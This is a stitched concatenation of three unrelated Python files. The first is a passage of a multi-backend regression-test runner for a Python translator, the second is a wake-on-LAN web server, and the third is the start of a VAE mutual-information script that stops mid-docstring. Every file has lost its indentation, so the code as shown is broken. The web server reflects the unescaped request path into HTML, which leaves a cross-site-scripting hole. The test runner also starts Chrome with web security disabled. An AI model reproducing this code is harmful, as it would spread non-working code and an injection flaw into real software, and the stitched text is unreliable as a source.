nodewebkit = os.path.expanduser('~/node-webkit-v0.9.1-linux-x64/nw')
if os.path.isfile( nodewebkit ): nodewebkit_runnable = True
else:
nodewebkit = os.path.expanduser('~/node-webkit-v0.8.4-linux-x64/nw')
if os.path.isfile( nodewebkit ): nodewebkit_runnable = True
if not show_details or '--no-nodewebkit' in sys.argv:
nodewebkit_runnable = False
#dart2js = os.path.expanduser( '~/dart-sdk-1.0/dart-sdk/bin/dart2js') ## TODO support dart-sdk-1.3+
dart2js = os.path.expanduser( '~/dart-sdk/bin/dart2js') # tested with dart 1.3
dart2js_runnable = runnable( dart2js + ' -h' ) and '--dart2js' in sys.argv
dart_exe = os.path.expanduser( '~/dart-sdk/bin/dart')
dart_runnable = os.path.isfile( dart_exe )
coffee_runnable = runnable( "coffee -v" ) and '--coffee' in sys.argv
lua_runnable = runnable( "lua -v" ) and '--lua' in sys.argv
#luajit_runnable = runnable( "luajit -v" ) and '--luajit' in sys.argv
luajit_runnable = runnable( "luajit -v" )
lua2js = os.path.abspath( '../external/lua.js/lua2js' )
luajs_runnable = os.path.isfile( lua2js ) and '--lua2js' in sys.argv
go_runnable = runnable( 'go version')
gopherjs_runnable = False #runnable( 'gopherjs') and '--gopherjs' in sys.argv
rust_runnable = runnable( 'rustc --help')
cpp_runnable = runnable( 'g++ --help')
assert rhino_runnable or node_runnable
if show_details:
display_errors = ""
else:
display_errors = "2>/dev/null"
def files():
"""returns all the filenames of the regression tests.
this also needs to copy all the original python files to /tmp
because `from xxx import *` syntax will trigger the translator
to read files from the same directory and insert them.
"""
tests = []
html_tests = []
benchmarks = []
mods = []
for dirpath, dirnames, filenames in os.walk('.'):
if dirpath == '.':
continue
for filename in filenames:
a = dirpath + os.path.sep + filename
if filename.endswith(".py"):
if 'bench' in dirpath:
benchmarks.append( a )
else:
tests.append( a )
elif 'html' in dirpath:
if filename.endswith(".html"):
html_tests.append( a )
elif filename.endswith('.py'): ## these are modules
mods.append( filename )
tmpdir = tempfile.gettempdir()
for mod in mods+tests:
data = open(mod,'rb').read()
name = os.path.split(mod)[-1]
open(os.path.join(tmpdir, name), 'wb').write( data )
tests.extend( html_tests )
tests.extend( benchmarks )
return tests
def read(filename):
"""Returns the file content as a string"""
f = open(filename)
content = f.read()
f.close()
return content
def write(filename, content):
"""Write the content into the file"""
f = open(filename, "w")
f.write(content)
f.close()
def run_command(command, returns_stdout_stderr=False, nodewebkit_workaround=False):
"""Returns the number of problems"""
if os.path.isfile("%s.errors" % tmpname):
os.unlink("%s.errors" % tmpname)
f = os.popen(command + " 2>%s.errors" % tmpname, 'r')
killed = False
try:
stdout = f.read().strip()
except KeyboardInterrupt:
stdout = f.read().strip()
killed = True
f.close()
stderr = read("%s.errors" % tmpname)
if nodewebkit_workaround:
stdout = stderr
stderr = ''
a = []
for line in stdout.splitlines():
if 'INFO:CONSOLE' in line:
line = line.replace('\\n', '\n')
line = line.replace('\\u003C', '<')
start = line.index('"')
end = line.rindex('"')
a.append( line[start+1:end] )
stdout = '\n'.join(a)
if stderr:
if show_details:
print('TEST ERROR!')
print(stderr)
if killed:
print(stdout)
sys.exit()
if returns_stdout_stderr:
return stdout, stderr
#########################
if show_details and stdout:
print(stdout)
unknown = []
for line in stdout.splitlines():
if _benchmark:
if line.startswith('#'):
_benchmark.append( line )
else:
#exe = command.split()[0]
_benchmark.append( _test_description + ' ' + line )
else:
unknown.append(line)
errors = '\n'.join(unknown) + stderr
d = {}
x = errors.count("Error fail")
if x:
d['Error'] = x
x = errors.count("Warning fail")
if x:
d['Warning'] = x
if len(d) == 0 and errors != '':
if '.py", line' in errors:
d["Syntax Error Python"] = 1
else:
d["?"] = 1
return d
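# Illustrative return values of run_command (hypothetical): a clean run yields
# {}, a run that printed "Error fail" twice and "Warning fail" once yields
# {'Error': 2, 'Warning': 1}, and a Python traceback yields
# {'Syntax Error Python': 1}.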
_benchmark = None
def in_benchmark():
if _benchmark: return True
else: return False
def start_benchmark( name ):
if not show_details: print('starting benchmark:', name)
global _benchmark
if name.endswith('-typed.py'):
untypedname = name.split('-typed.py')[0] + '.py'
_benchmark = open('/tmp/%s.perf' %untypedname, 'rb').read().decode('utf-8').splitlines()
else:
_benchmark = [
'font=Helvetica',
'fontsz=12',
'=color_per_datum',
'yformat=%g',
'ylabel=seconds'
]
def end_benchmark( name ):
print('ending benchmark:', name)
global _benchmark
path = '/tmp/%s.perf' %name
f = open( path, 'wb' )
data = '\n'.join( _benchmark )
f.write( data.encode('utf-8') )
f.close()
os.system( './bargraph.pl -eps %s > /tmp/%s.eps' %(path,name))
_benchmark = None
def patch_assert(filename):
"""Patch the regression tests to add information into asserts"""
out = []
for i, line in enumerate(read(filename).split('\n')):
out.append(re.sub("(TestError|TestWarning)\((.*)\)",
r'\1("%s",%d,\2,u"""\2""")' % (filename, i),
line)
)
return '\n'.join(out)
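# For example (hypothetical input), patch_assert rewrites a line such as
#     TestError( x == 1 )
# found at line index 3 of "./lang/foo.py" into
#     TestError("./lang/foo.py",3, x == 1 ,u""" x == 1 """)
# so that a failure reports the file, the line, and the asserted expression.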
_patch_header = """# -*- coding: utf-8 -*-
def TestError(file, line, result, test):
if result == False:
print(file + ":" + str(line) + " Error fail " + test)
def TestWarning(file, line, result, test):
if result == False:
print(file + ":" + str(line) + " Warning fail " + test)
"""
_patch_header_go = """# -*- coding: utf-8 -*-
def TestError(file:string, line:int, result:bool, test:string):
if result == False:
print(file + ":" + str(line) + " Error fail " + test)
"""
_patch_header_rust = """# -*- coding: utf-8 -*-
def TestError(file:string, line:int, result:bool, test:string):
if result == False:
print(file, line, " Error fail ", test)
"""
_python_only_extra_header = """
try:
import threading
threading.start_webworker = lambda f,a: threading._start_new_thread(f,a)
threading.start_new_thread = threading._start_new_thread
except ImportError:
pass
class __faker__(object):
def __enter__(self, *args): pass
def __exit__(self, *args): pass
def __call__(self, *args, **kw):
return lambda f: f
def vectorize(self, f):
return f
def main(self, f):
return f
def object(self, f):
return f
def method(self, f):
return f
webworker = __faker__()
glsl = __faker__()
gpu = __faker__()
returns = __faker__()
typedef = __faker__()
vec2 = None
mat4 = None
def int16(a): return int(a)
try:
import numpy
except ImportError:
try:
import numpypy as numpy
except ImportError:
pass
from math import isnan as isNaN
"""
def patch_python(filename, dart=False, python='PYTHONJS', backend=None):
"""Rewrite the Python code"""
code = patch_assert(filename)
## a main function can not be simply injected like this for dart,
## because dart has special rules about what can be created outside
## of the main function at the module level.
#if dart:
# out = []
# main_inserted = False
# for line in code.splitlines():
# if line.startswith('TestError') or line.startswith('TestWarning'):
# if not main_inserted:
# out.append('def main():')
# main_inserted = True
# out.append( '\t'+line )
# else:
# out.append( line )
# code = '\n'.join( out )
a = [
'PYTHON="%s"'%python,
'BACKEND="%s"'%backend,
]
if backend == 'RUST':
a.append(_patch_header_rust)
elif backend in ('GO', 'CPP'):
a.append(_patch_header_go)
else:
a.append(_patch_header)
if python != 'PYTHONJS': ## remove extra type syntax to run in regular Python
code = typedpython.transform_source( code, strip=True )
a.append( _python_only_extra_header )
a.append( code )
if not dart and python != 'PYTHONJS':
a.append( 'main()' )
return '\n'.join( a )
def run_python_test_on(filename):
"""Python2"""
write("%s.py" % tmpname, patch_python(filename, python='PYTHON2'))
return run_command("python %s.py %s" % (tmpname, display_errors))
def run_python3_test_on(filename):
"""Python3"""
write("%s.py" % tmpname, patch_python(filename, python='PYTHON3'))
return run_command("python3 %s.py %s" % (tmpname, display_errors))
def translate_js(filename, javascript=False, dart=False, coffee=False, lua=False, go=False, rust=False, cpp=False, multioutput=False, requirejs=True):
global tmpname
tmpname = os.path.join(
tempfile.gettempdir(),
'regtest-%s'%filename.split('/')[-1]
)
output_name = "%s.py" % tmpname
if javascript:
content = 'pythonjs.configure(javascript=True)\n' + patch_python(filename, backend='JAVASCRIPT')
elif dart:
source = [
'pythonjs.configure(dart=True)',
patch_python(filename, dart=True, backend='DART')
]
content = '\n'.join( source )
elif lua:
source = [
'pythonjs.configure(lua=True)',
patch_python(filename, backend='LUA')
]
content = '\n'.join( source )
elif go:
content = patch_python(filename, backend='GO')
elif rust:
content = patch_python(filename, backend='RUST')
elif cpp:
content = patch_python(filename, backend='CPP')
else:
content = patch_python(filename)
code = '\n'.join(
[
'# -*- coding: utf-8 -*-',
'pythonjs.configure(runtime_exceptions=False)',
content
]
)
write(output_name, code)
cmd = [
os.path.join("..", "rusthon.py"),
output_name,
'--output=/tmp/output',
'--dump',
]
if dart:
cmd.append( '--dart' )
elif lua:
cmd.append( '--lua')
elif go:
cmd.append( '--go' )
elif rust:
cmd.append( '--rust' )
elif cpp:
cmd.append( '--c++' )
elif javascript:
cmd.append( '--javascript' )
if not requirejs:
cmd.append( '--no-wrapper' )
print(' '.join(cmd))
stdout, stderr = run_command(' '.join(cmd), returns_stdout_stderr=True)
if stderr:
return ''
else:
stdout = open('/tmp/output', 'rb').read().decode('utf-8')
jsheader = ''
if multioutput or (stdout.startswith("{") and stdout.endswith("}")):
d = json.loads( stdout )
stdout = d.pop('main')
#builtins = read(os.path.join("../pythonjs", "pythonjs.js"))
for jsfile in d:
if not jsfile.startswith('/'):
stdout = stdout.replace('"%s"' %jsfile, '"/tmp/%s"' %jsfile)
write(
os.path.join('/tmp', jsfile),
'\n'.join( [jsheader, d[jsfile]] )
)
if dart:
if os.path.isfile('/tmp/dart2js-output.js'):
os.unlink('/tmp/dart2js-output.js')
dart_input = '/tmp/dart2js-input.dart'
open( dart_input, 'wb').write( stdout.encode('utf-8') )
cmd = [
dart2js,
'-o', '/tmp/dart2js-output.js',
dart_input
]
if show_details:
subprocess.call( cmd )
else:
sout, serr = run_command(' '.join(cmd), returns_stdout_stderr=True)
if os.path.isfile('/tmp/dart2js-output.js'):
return open('/tmp/dart2js-output.js', 'rb').read().decode('utf-8')
else:
return ''
else:
return '\n'.join( [jsheader, stdout] )
def run_if_no_error(function):
"""Run the function if the JS code is not empty"""
global js
if js:
return function(js)
else:
return {'Translation error':1}
def run_pythonjs_test_on(dummy_filename):
"""JS PythonJS tests"""
return run_if_no_error(run_js_rhino)
def run_pythonjsjs_test_on(filename):
"""JSJS PythonJS with javascript tests"""
return run_pythonjs_test_on(filename)
def run_js_rhino(content):
"""Run Javascript using Rhino"""
builtins = read(os.path.join("../pythonjs", "pythonjs.js"))
# Patch in order to run Rhino
builtins = builtins.replace('Object.create(null)', '{}', 1)
# Add the program to test
content = builtins + content
# Remove documentation strings from JavaScript (Rhino don't like)
content = re.sub('^ *".*" *$', '', content)
# Add the console for Rhino
content = '''
console = { log: print } ;
process = { title:"", version:"" } ;
''' + content
write("%s.js" % tmpname, content)
return run_command("rhino -O -1 %s.js" % tmpname)
def run_pythonjs_test_on_node(dummy_filename):
"""Rusthon JS (nodejs)"""
return run_if_no_error(run_js_node)
def run_pythonjsjs_test_on_node(filename):
"""PythonJS (fast backend)"""
return run_pythonjs_test_on_node(filename)
def run_js_node(content):
"""Run Javascript using Node"""
#builtins = read(os.path.join("../pythonjs", "pythonjs.js"))
write("/tmp/mymodule.js", content)
lines = [
"var requirejs = require('requirejs')",
"var module = requirejs('mymodule')",
"module.main()"
]
write("%s.js" % tmpname, '\n'.join(lines))
return run_command("node %s.js" % tmpname)
def run_pythonjs_test_on_nodewebkit(dummy_filename):
"""Rusthon JS (nodewebkit)"""
return run_if_no_error(run_js_nodewebkit)
def run_pythonjsjs_test_on_nodewebkit(filename):
"""PythonJS (fast backend) - NodeWebkit"""
return run_pythonjs_test_on_nodewebkit(filename)
def run_js_nodewebkit(content):
"""Run Javascript using NodeWebkit"""
## there is likely a bug in requirejs and/or nodewebkit that prevents WebWorkers from working,
    ## `workerjs` for node also seems to be incompatible with nodewebkit and requirejs,
## as a quick workaround simply strip away the wrapper function from the javascript.
code = '\n'.join( content.strip().splitlines()[1:-2] )
write("/tmp/package.json", '{"name":"test", "main":"test.html"}')
#write("/tmp/mymodule.js", content)
lines = [
"var __nw = require('nw.gui')",
"var requirejs = require('requirejs')",
#"var module = requirejs('mymodule')",
#"module.main()",
code,
"main()",
"__nw.App.quit()"
]
html = ['<html>']
if webclgl:
for data in webclgl:
html.append('<script>')
html.append( data )
html.append('</script>')
html.append('<script>')
html.extend( lines )
html.append('</script>')
html.append('</html>')
write("/tmp/test.html", '\n'.join(html))
#write("%s.js" % tmpname, '\n'.join(lines))
#return run_command("node %s.js" % tmpname)
return run_command("%s /tmp" %nodewebkit, nodewebkit_workaround=True)
def run_pythonjs_dart_test_on_node(dummy_filename):
"""PythonJS (Dart backend - dart2js)"""
return run_if_no_error(run_dart2js_node)
def run_dart2js_node(content):
"""Run Dart2js using Node"""
write("%s.js" % tmpname, content)
return run_command("node %s.js" % tmpname)
def run_pythonjs_dart_test_on_dart(dummy_filename):
"""PythonJS (Dart backend - Dart VM)"""
return run_if_no_error(run_dart)
def run_dart(content):
"""Run Dart2js using Node"""
#write("%s.js" % tmpname, content)
return run_command("%s %s" % (dart_exe, "/tmp/dart2js-input.dart"))
def run_pythonjs_coffee_test_on_node(dummy_filename):
"""PythonJS (CoffeeScript)"""
return run_if_no_error(run_coffee_node)
def run_coffee_node(content):
"""Run CoffeeScript using Node"""
#builtins = read(os.path.join("../pythonjs", "pythonjs.js"))
write("%s.js" % tmpname, content)
return run_command("node %s.js" % tmpname)
def run_pythonjs_lua_test_on_lua(dummy_filename):
"""PythonJS (Lua) on Lua"""
return run_if_no_error(run_lua_lua)
def run_lua_lua(content):
"""Run Lua using Lua"""
write("%s.lua" % tmpname, content)
return run_command("lua %s.lua" % tmpname)
def run_pythonjs_lua_test_on_luajit(dummy_filename):
"""PythonJS (LuaJIT backend)"""
return run_if_no_error(run_lua_luajit)
def run_lua_luajit(content):
"""Run Lua using LuaJIT"""
write("%s.lua" % tmpname, content)
return run_command("luajit %s.lua" % tmpname)
def run_pythonjs_luajs_test_on_node(dummy_filename):
"""PythonJS (Lua.js)"""
return run_if_no_error(run_luajs_node)
def run_luajs_node(content):
"""Run Lua.js using Node"""
builtins = read(os.path.join("../external/lua.js", "lua.js"))
write("%s.js" % tmpname, builtins + '\n' + content)
return run_command("node %s.js" % tmpname)
def run_pythonjs_go_test(dummy_filename):
"""PythonJS (Go backend)"""
return run_if_no_error(run_go)
def run_go(content):
"""compile and run go program"""
write("%s.go" % tmpname, content)
errors = run_command("go build -o /tmp/regtest-go %s.go" % tmpname)
if errors:
return errors
else:
return run_command( '/tmp/regtest-go' )
def run_pythonjs_gopherjs_test(dummy_filename):
"""PythonJS (Gopherjs)"""
return run_if_no_error(run_gopherjs_node)
def run_gopherjs_node(content):
"""Run Gopherjs using Node"""
write("%s.js" % tmpname, content)
return run_command("node %s.js" % tmpname)
## rust backend ##
def run_pythonjs_rust_test(dummy_filename):
"""Rusthon"""
return run_if_no_error(run_rust)
def run_rust(content):
"""compile and run go program"""
write("%s.rs" % tmpname, content)
#errors = run_command("rustc -o /tmp/regtest-rust %s.rs" % tmpname)
subprocess.check_call(['rustc', '--crate-name', 'regtest', '-o', '/tmp/regtest-rust', '%s.rs' % tmpname] )
errors = False
if errors:
return errors
else:
return run_command( '/tmp/regtest-rust' )
## c++ backend ##
def run_pythonjs_cpp_test(dummy_filename):
"""Rusthon C++ Backend"""
return run_if_no_error(run_cpp)
def run_cpp(content):
"""compile and run c++ program"""
write("%s.cpp" % tmpname, content)
if in_benchmark():
        ## gcc will not use atomic updates on std::shared_ptr when not linked to libpthread, so -pthread is omitted here.
## http://stackoverflow.com/questions/15129263/is-there-a-non-atomic-equivalent-of-stdshared-ptr-and-why-isnt-there-one-in
cmd = ['g++', '-O3', '-fprofile-generate', '-march=native', '-mtune=native', '%s.cpp'%tmpname, '-o', '/tmp/regtest-cpp', '-std=c++11' ]
else:
cmd = ['g++', '-march=native', '-mtune=native', '%s.cpp'%tmpname, '-o', '/tmp/regtest-cpp', '-pthread', '-std=c++11' ]
try:
subprocess.check_call( cmd )
except subprocess.CalledProcessError:
## reading template errors become so long we need to filter them out below ##
print('='*80)
p = subprocess.Popen(cmd, stderr=subprocess.PIPE)
p.wait()
if p.returncode: ## there was an error
error = p.stderr.read().decode('utf-8')
for line in error.splitlines():
if '.py' in line:
lineno = line.split(':')[1]
if 'In function' in line:
print(lineno, line.split('`')[-1])
elif 'error:' in line:
print(lineno, '\t'+line.split('error: ')[-1])
else:
print(lineno, line)
sys.exit()
if in_benchmark():
run_command( '/tmp/regtest-cpp' )
cmd = ['g++', '-O3', '-fprofile-use', '-march=native', '-mtune=native', '%s.cpp'%tmpname, '-o', '/tmp/regtest-cpp', '-std=c++11' ]
print('<G++ PGO>')
subprocess.check_call( cmd )
return run_command( '/tmp/regtest-cpp' )
else:
return run_command( '/tmp/regtest-cpp' )
## NodeWebkit and Google Chrome ##
def run_html_test( filename, sum_errors ):
lines = open(filename, 'rb').read().decode('utf-8').splitlines()
filename = os.path.split(filename)[-1]
doc = []; script = None
for line in lines:
if line.strip().startswith('<link') and 'stylesheet' in line and '~/' in line:
doc.append('<style>')
css = line.split('href=')[-1].split()[0][1:-1]
print('css', css)
assert css.startswith('~/')
assert css.endswith('.css')
assert os.path.isfile( os.path.expanduser(css) )
doc.append( open(os.path.expanduser(css), 'rb').read().decode('utf-8') )
doc.append('</style>')
elif line.strip().startswith('<script'):
if 'type="text/python"' in line:
doc.append( '<script type="text/javascript">')
script = list()
elif 'src=' in line and '~/' in line: ## external javascripts installed in users home folder
x = line.split('src="')[-1].split('"')[0]
if os.path.isfile(os.path.expanduser(x)):
doc.append( '<script type="text/javascript">' )
doc.append( open(os.path.expanduser(x), 'rb').read().decode('utf-8') )
doc.append( '</script>')
else:
doc.append( line )
elif line.strip() == '</script>':
if script:
open('/tmp/%s.js'%filename, 'wb').write( ('\n'.join(script)).encode('utf-8') )
js = translate_js( '/tmp/%s.js'%filename, requirejs=False, javascript=True ) ## inserts TestError and others
doc.append( js )
doc.append( line )
script = None
elif isinstance( script, list ):
script.append( line )
else:
doc.append( line )
html = '\n'.join(doc)
open('/tmp/%s.html'%filename, 'wb').write( html.encode('utf-8') )
if '--nodewebkit' in sys.argv:
## nodewebkit can bypass all cross origin browser-side security
cfg = '{"name":"test", "main":"%s.html", "window":{"width":1200, "height":700}}' %filename
write("/tmp/package.json", cfg)
run_command("%s /tmp" %nodewebkit, nodewebkit_workaround=True)
else:
## chrome-extension that won't force you to close your browser windows when deving: `Allow-Control-Allow-Origin:*`
## this still fails with iframes that do not allow cross origin.
cmd = [
'google-chrome',
'--app=file:///tmp/%s.html'%filename,
            '--allow-file-access-from-files', ## only takes effect if chrome is closed
            '--allow-file-access', ## only takes effect if chrome is closed
            '--disable-web-security' ## only takes effect if chrome is closed
]
## non-blocking, TODO check for chrome extension that allows output of console.log to stdout
subprocess.check_call(cmd)
table_header = "%-12.12s %-28.28s"
table_cell = '%-6.6s'
def run_test_on(filename):
"""run one test and returns the number of errors"""
if not show_details:
f = open(filename)
comment = f.readline().strip(" \n\"'")
f.close()
print(table_header % (filename[2:-3], comment), end='')
sum_errors = {}
if filename.endswith('.html'):
run_html_test( filename, sum_errors )
return sum_errors
def display(function):
global _test_description
_test_description = function.__doc__
if show_details:
print('\n<%s>\n' % function.__doc__)
errors = function(filename)
if errors:
if not show_details:
print(table_cell % ''.join('%s%d' % (k[0], v)
for k, v in errors.items()),
end='')
else:
if not show_details:
print(table_cell % 'OK', end='')
sys.stdout.flush()
for k, v in errors.items():
sum_errors[k] = sum_errors.get(k, 0) + v
if show_details:
print('-'*77)
if 'requirejs' not in filename and not filename.startswith('./go/'):
display(run_python_test_on)
display(run_python3_test_on)
if pypy_runnable:
display(run_pypy_test_on)
if old_pypy_runnable:
display(run_old_pypy_test_on)
global js
do_js_test = not filename.startswith( ('./go/', './asm/', './rust/', './c++') )
if do_js_test:
js = translate_js(
filename,
javascript=True,
            multioutput=filename.startswith(('./threads/', './bench/webworker'))
)
if rhino_runnable:
display(run_pythonjs_test_on)
if node_runnable:
display(run_pythonjs_test_on_node)
if nodewebkit_runnable:
display(run_pythonjs_test_on_nodewebkit)
## TODO more optimized js settings pythonjs-minimal.js ##
#if '--no-javascript-mode' not in sys.argv and do_js_test:
# js = translate_js(filename, javascript=True, multioutput=filename.startswith('./threads/' or filename.startswith('./bench/webworker')))
# if rhino_runnable:
# display(run_pythonjsjs_test_on)
# if node_runnable:
# display(run_pythonjsjs_test_on_node)
# if nodewebkit_runnable:
# display(run_pythonjsjs_test_on_nodewebkit)
if 'requirejs' not in filename:
if dart_runnable:
js = translate_js(filename, javascript=False, dart=True)
display(run_pythonjs_dart_test_on_dart)
if dart2js_runnable and node_runnable:
js = translate_js(filename, javascript=False, dart=True)
display(run_pythonjs_dart_test_on_node)
if coffee_runnable and node_runnable:
js = translate_js(filename, javascript=False, dart=False, coffee=True)
display(run_pythonjs_coffee_test_on_node)
if luajs_runnable and node_runnable:
            js = translate_js(filename, lua=True)
display(run_pythonjs_luajs_test_on_node)
if lua_runnable:
js = translate_js(filename, lua=True)
display(run_pythonjs_lua_test_on_lua)
if luajit_runnable:
js = translate_js(filename, lua=True)
display(run_pythonjs_lua_test_on_luajit)
if go_runnable:
js = translate_js(filename, go=True)
display(run_pythonjs_go_test)
if gopherjs_runnable:
            js = translate_js(filename, go=True)
display(run_pythonjs_gopherjs_test)
if rust_runnable:
js = translate_js(filename, rust=True)
display(run_pythonjs_rust_test)
if cpp_runnable:
js = translate_js(filename, cpp=True)
display(run_pythonjs_cpp_test)
print()
return sum_errors
def run():
"""Run all the tests or the selected ones"""
if not show_details:
headers = ["Py-\nthon2", "Py-\nthon3"]
if pypy_runnable:
headers.append("PyPy\n")
if old_pypy_runnable:
headers.append("PyPy\n1.9")
if rhino_runnable:
headers.append("JS\nRhino")
if node_runnable:
headers.append("JS\nNode")
if nodewebkit_runnable:
headers.append("JS\nWebkit")
if rhino_runnable:
headers.append("JSJS\nRhino")
if node_runnable:
headers.append("JSJS\nNode")
if nodewebkit_runnable:
headers.append("JSJS\nWebkit")
if dart_runnable:
headers.append("Dart\nDart")
if node_runnable:
if dart2js_runnable:
headers.append("Dart\nNode")
if coffee_runnable:
headers.append("Coffe\nNode")
if luajs_runnable:
headers.append("LuaJS\nNode")
if lua_runnable:
headers.append("Lua\nLua")
if luajit_runnable:
headers.append("Lua\nJIT")
if go_runnable:
headers.append("Go\n-")
if rust_runnable:
headers.append("Rust\n-")
print(table_header % ("", "Regtest run on")
+ ''.join(table_cell % i.split('\n')[0]
for i in headers)
)
print(table_header % ("", "")
+ ''.join(table_cell % i.split('\n')[1]
for i in headers
)
)
errors = []
total_errors = {}
for filename in files():
if show_details:
if os.path.abspath(filename) not in argv:
continue
print('*'*77)
print(filename)
if filename.startswith('./bench/'):
start_benchmark( os.path.split(filename)[-1] )
sum_errors = run_test_on(filename)
if sum_errors:
errors.append(filename)
for k, v in sum_errors.items():
total_errors[k] = total_errors.get(k, 0) + v
if filename.startswith('./bench/'):
end_benchmark( os.path.split(filename)[-1] )
print()
if errors:
nr_errors = 0
if not show_details:
print("To see details about errors, run the commands:")
for i in errors:
print('\t%s %s' % (sys.argv[0], i))
print("\nSummary of errors:")
for k, v in total_errors.items():
print('\t%d %s' % (v, k))
if k in ('Error', 'Translation error'):
nr_errors += v
if nr_errors == 0:
print("\nRegression tests run fine but with warnings")
sys.exit(nr_errors)
else:
print("Regression tests run fine")
sys.exit(0)
run()
|
|
#!/usr/bin/env python
"""
webwol
Generates wake-on-lan packets via a web interface. Useful for WOL when you're on
a different subnet, over a VPN, via an HTTP interface etc.
A secondary goal of this tool is to minimize external dependencies required, so
that deployment is trivial and can happen anywhere that Python can run. As a
result, some of this code is nasty (see: HTML templating via string interpolation,
manual response code generation, etc). This tradeoff is intentional, as the
interface for this tool is designed to be as simple as possible and therefore
can be a bit of a mess to create in the name of packaging and deployment
simplicity.
"""
import argparse
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import codecs
import json
import logging
import re
import socket
import sys
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
# python3-compatible shim for checking if a thing is a string
try:
basestring
except NameError:
basestring = str
HTML_TEMPLATE = """
<html>
<head>
<title>WebWol - One-touch Wake-On-Lan Interface</title>
<style>
body {
margin: 0;
padding: 1em;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
}
a, a:visited, a:hover {
color: #33f;
text-decoration: none;
}
.flash {
border: 2px #fff solid;
border-radius: 4px;
color: #191919;
display: inline-block;
padding: 0.5em;
white-space: pre-wrap;
}
.flash code {
color: #39393A;
font-size: larger;
}
.success {
background-color: #0d1;
border-color: #0a0;
}
.warning {
background-color: #f0ad4e;
border-color: #c08d1e;
}
.error {
background-color: #d10;
border-color: #a10;
}
.mac {
color: #666;
margin-left: 0.50em;
}
</style>
</head>
<body>
<h1>WebWol</h1>
%s
</body>
</html>
"""
def build_webwol_request_handler(wol_config):
class WebWolHTTPRequestHandler(BaseHTTPRequestHandler):
wol_hosts = wol_config
def write_response(self, response):
self.wfile.write((HTML_TEMPLATE % response).encode('UTF-8'))
def generate_wol_list(self):
wol_idx = "\n".join([
"<li><a href='/%s'>%s</a><code class='mac'>[%s]</code></li>" % (host, host, mac)
for (host, mac) in self.wol_hosts.items()])
return "<ul>\n%s\n</ul>" % wol_idx
def do_GET(self):
response = ""
wol_host = unquote(self.path[1:])
if self.path != "/" and wol_host in self.wol_hosts:
# send a WOL request
wol_mac = self.wol_hosts[wol_host]
try:
send_wol(self.wol_hosts[wol_host])
except Exception as e:
self.send_response(500)
response += "<div class='flash error'>"
response += "There was an error sending a wake-on-lan packet "
response += "to <code>%s (%s)</code>. " % (wol_host, wol_mac)
response += "Please try again or check the webwol "
response += "logs for errors."
response += "</div>"
logging.error(e)
else:
self.send_response(200)
response += "<div class='flash success'>"
response += "Successfully sent wake-on-lan packet "
response += "to <code>%s (%s)</code>. " % (wol_host, wol_mac)
response += "</div>"
elif self.path != "/":
# Return a 404 and let the user know we couldn't find that host,
# then write the index
self.send_response(404)
response += "<div class='flash warning'>"
response += "Could not find configuration for host <code>%s</code>. " % wol_host
response += "Choose one from the list below."
response += "</div>"
else:
# Write out the index
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
response += "<p>Click a host below to send a Wake-On-Lan request.</p>"
response += self.generate_wol_list()
self.write_response(response)
return WebWolHTTPRequestHandler
def format_wol(mac):
mac = "".join(mac.split(":"))
msg = ("FFFFFFFFFFFF%s" % (mac*16)).encode('ascii')
raw_msg = codecs.decode(msg, "hex_codec")
return raw_msg
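# Magic packet layout: 6 bytes of 0xFF followed by the target MAC repeated 16
# times, 102 bytes in total. For example (hypothetical MAC), in Python 3:
#     format_wol("12:34:56:78:90:ab") == b"\xff" * 6 + bytes.fromhex("1234567890ab") * 16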
def send_wol(mac):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
wol_msg = format_wol(mac)
logging.info("Sending magic packet to 255.255.255.255 for %s" % mac)
s.sendto(wol_msg, ("255.255.255.255", 9))
def build_http_server(args, wol_config):
server_address = (args.bind_address, args.port)
request_handler = build_webwol_request_handler(wol_config)
server = HTTPServer(server_address, request_handler)
return server
def build_arg_parser():
description = "Presents a web interface for sending one-click wake-on-lan packets to pre-defined targets"
parser = argparse.ArgumentParser(description=description)
parser.add_argument("config_file",
help="The configuration file to read wake-on-lan targets from")
parser.add_argument("-b", "--bind-address",
dest="bind_address",
default="0.0.0.0",
help="The address to bind to. Default: %(default)s")
parser.add_argument("-p", "--port",
dest="port",
type=int,
default=10080,
help="The port to listen on. Default: %(default)s")
parser.add_argument('-v', '--verbose',
dest="loglevel",
action="store_const", const=logging.DEBUG,
default=logging.INFO,
help="Verbose output")
return parser
def load_config(config_path):
logging.debug("Reading configuration from %s" % config_path)
with open(config_path) as f:
config_contents = f.read()
return json.loads(config_contents)
def reject_config(config):
mac_re = re.compile("([0-9a-f]{2}:){5}[0-9a-f]{2}")
reasons = []
if not all((isinstance(v, basestring) for v in config.values())):
reasons.append("""Please specify configuration as a key:value pairs of strings, like:
{
"moonbase": "fa:ce:de:ed:01:23",
"sadcow": "de:ad:be:ef:de:ef"
}""")
else:
for mac in config.values():
if not mac_re.match(mac):
reasons.append("""I'm bad at parsing MAC addresses and "%s" did not look like a MAC address to me.
Please format MAC addresses like 12:34:56:78:90:ab.""" % mac)
return reasons
if __name__ == "__main__":
parser = build_arg_parser()
args = parser.parse_args()
log_format = ""
logging.basicConfig(level=args.loglevel, format=log_format)
wol_config = load_config(args.config_file)
reject_reasons = reject_config(wol_config)
if reject_reasons:
logging.error("Failed to parse config from %s" % args.config_file)
for reason in reject_reasons:
logging.error(reason)
sys.exit(1)
server = build_http_server(args, wol_config)
server.serve_forever()
|
|
from typing import Callable, Generator, Iterator, Union, Optional
import warnings
import numpy as np
import tensorflow as tf
from sklearn.datasets import load_digits
from sklearn.decomposition import PCA
from sklearn.metrics.cluster import entropy as entropy1D
from tensorflow_probability.python import distributions as tfd
from odin.utils import one_hot
from odin.bay.vi import VAE, RVconf, NetConf, Beta10VAE, FactorVAE
from odin.fuel import dSprites
from odin.networks import get_networks, get_optimizer_info
from tqdm import tqdm
import torch
from sklearn.feature_selection import mutual_info_classif, mutual_info_regression
from sklearn.metrics import mutual_info_score
np.random.seed(1)
tf.random.set_seed(1)
def estimate_Izx(fn_px_z: Callable[[tf.Tensor], tfd.Distribution],
pz: tfd.Distribution,
n_samples_z: int = 10000,
n_mcmc_x: int = 100,
batch_size: int = 32,
verbose: bool = True):
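  """Sketch (inferred from the implementation below, not an authoritative
  description) of a Monte Carlo estimate of I(Z;X).

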